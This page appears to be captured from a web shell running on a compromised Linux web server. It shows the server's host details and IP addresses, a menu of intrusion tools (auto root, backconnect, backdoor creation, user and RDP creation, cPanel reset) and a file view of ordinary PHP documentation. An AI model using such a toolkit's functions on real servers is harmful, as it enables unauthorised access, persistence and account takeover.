Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 3.12.161.239
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
alt-php73-common-7.3.33 /
[ HOME SHELL ]
Name
Size
Permission
Action
CODING_STANDARDS
12.43
KB
-rw-r--r--
CREDITS
93
B
-rw-r--r--
INSTALL
105
B
-rw-r--r--
LICENSE
3.13
KB
-rw-r--r--
NEWS
92.14
KB
-rw-r--r--
README.EXT_SKEL
1.35
KB
-rw-r--r--
README.GIT-RULES
5.16
KB
-rw-r--r--
README.MAILINGLIST_RULES
3.35
KB
-rw-r--r--
README.NEW-OUTPUT-API
5.05
KB
-rw-r--r--
README.PARAMETER_PARSING_API
7.64
KB
-rw-r--r--
README.REDIST.BINS
24.16
KB
-rw-r--r--
README.RELEASE_PROCESS
15.32
KB
-rw-r--r--
README.SELF-CONTAINED-EXTENSIO...
4.87
KB
-rw-r--r--
README.STREAMS
14.95
KB
-rw-r--r--
README.SUBMITTING_PATCH
7.93
KB
-rw-r--r--
README.TESTING
11.36
KB
-rw-r--r--
README.UNIX-BUILD-SYSTEM
4.16
KB
-rw-r--r--
README.WIN32-BUILD-SYSTEM
114
B
-rw-r--r--
README.input_filter
5.19
KB
-rw-r--r--
README.md
1.57
KB
-rw-r--r--
TSRM_LICENSE
1.28
KB
-rw-r--r--
ZEND_LICENSE
2.74
KB
-rw-r--r--
php.ini-development
69.7
KB
-rw-r--r--
php.ini-production
69.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.EXT_SKEL
WHAT IT IS It's a tool for automatically creating the basic framework for a PHP extension. HOW TO USE IT Very simple. First, change to the ext/ directory of the PHP sources. Then run the following php ext_skel.php --ext extension_name and everything you need will be placed in directory ext/extension_name. If you don't need to test the existence of any external header files, libraries or functions in them, the extension is ready to be compiled in PHP. To compile the extension, run the following: ./buildconf; ./configure --enable-extension_name; make The definition of PHP_extension_NAME_VERSION will be present in the php_extension_name.h and injected into the zend_extension_entry definition. This is required by the PECL website for the version string conformity checks against package.xml SOURCE AND HEADER FILE NAME The ext_skel.php script generates 'extension_name.c' and 'php_extension_name.h' as the main source and header files. Keep these names. extension functions (User functions) must be named extension_name_function() When you need to expose extension functions to other extensions, expose functions strictly needed by others. Exposed internal function must be named php_extension_name_function() See also CODING_STANDARDS. OTHER OPTIONS Run php ext_skel.php --help to see the available options.
Close